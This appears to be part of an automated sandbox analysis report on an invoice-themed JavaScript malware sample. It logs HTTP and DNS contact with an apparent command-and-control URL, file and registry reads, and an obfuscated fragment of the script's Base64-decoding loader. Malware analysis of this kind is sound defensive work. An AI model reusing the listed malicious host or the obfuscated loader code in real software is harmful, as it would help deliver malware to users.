Source: global traffic |
HTTP traffic detected: GET /LklKHfvvvCDcx45jv454545/index.php HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.energym63.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /LklKHfvvvCDcx45jv454545/index.php HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.energym63.comConnection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: www.energym63.com |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Apr 2021 15:10:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveSet-Cookie: route=1619017820.031.19726.874988; Path=/; HttpOnlyData Raw: 31 32 64 0d 0a 20 20 20 20 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 27 20 78 6d 6c 3a 6c 61 6e 67 3d 27 65 6e 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 12d <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'><meta http-equiv='Content-Type' content='text/html;charset=UTF-8'><head> <title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p></html> |
Source: wscript.exe, 00000000.00000002.225476465.000002838B44F000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.217916044.000002838D4F1000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.225062222.000002838D158000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.223300582.000002838D1D0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.223330353.000002838D153000.00000004.00000001.sdmp |
String found in binary or memory: http://www.energym63.com/LklKHfvvvCDcx45jv454545/index.php |
Source: wscript.exe, 00000000.00000003.217927319.000002838D4FA000.00000004.00000001.sdmp |
String found in binary or memory: http://www.energym63.com/LklKHfvvvCDcx45jv454545/index.php( |
Source: wscript.exe, 00000000.00000002.225476465.000002838B44F000.00000004.00000001.sdmp |
String found in binary or memory: http://www.energym63.com/LklKHfvvvCDcx45jv454545/index.php6 |
Source: wscript.exe, 00000000.00000002.225476465.000002838B44F000.00000004.00000001.sdmp |
String found in binary or memory: http://www.energym63.com/LklKHfvvvCDcx45jv454545/index.phpU |
Source: wscript.exe, 00000000.00000002.225400514.000002838B3CC000.00000004.00000020.sdmp |
String found in binary or memory: https://login.live.com |
Source: Facture-FB745M1597.js |
Initial sample: Strings found which are bigger than 50 |
Source: classification engine |
Classification label: mal60.evad.winJS@1/0@1/1 |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Automated click: OK |
Source: C:\Windows\System32\wscript.exe |
Automated click: OK |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: WScript.Echo(lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllluuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuttttttttttttttttttttttttttttttttttttttttttttttttttuullllllllllllllllllllllllllllluuuulllllllllllllllloooooooooooooo________[0],5,lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllluuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuttttttttttttttttttttttttttttttttttttttttttttttttttuullllllllllllllllllllllllllllluuuulllllllllllllllloooooooooooooo________[1]);var Base64={_keyStr:lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllluuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuttttttttttttttttttttttttttttttttttttttttttttttttttuullllllllllllllllllllllllllllluuuulllllllllllllllloooooooooooooo________[2],decode:function(oooooooooooooooooooooooooooooooooooooooooooooooooooooooo____________________________________________ooooooooooooooooooooo__________________________________________________ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooouuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuoooooollllllllllllllllllllllllllllliiiiioooooooooooooooooo________){var _0xb8c0x4=lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllluuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuttttttttttttttttttttttttttttttttttttttttttttttttttuullllllllllllllllllllllllllllluuuulllllllllllllllloooooooooooooo________[3];var uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuullllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllluuuuuuooooooooooo________,uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuullllllllllllllllllllllllllllllllllllllllllllllllllllnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnllllllnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnllllllluuuuuuooooooooooo________,_0xb8c0x7;var _0xb8c0x8,uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuulllllllllllllllllllllllllllllllllllll |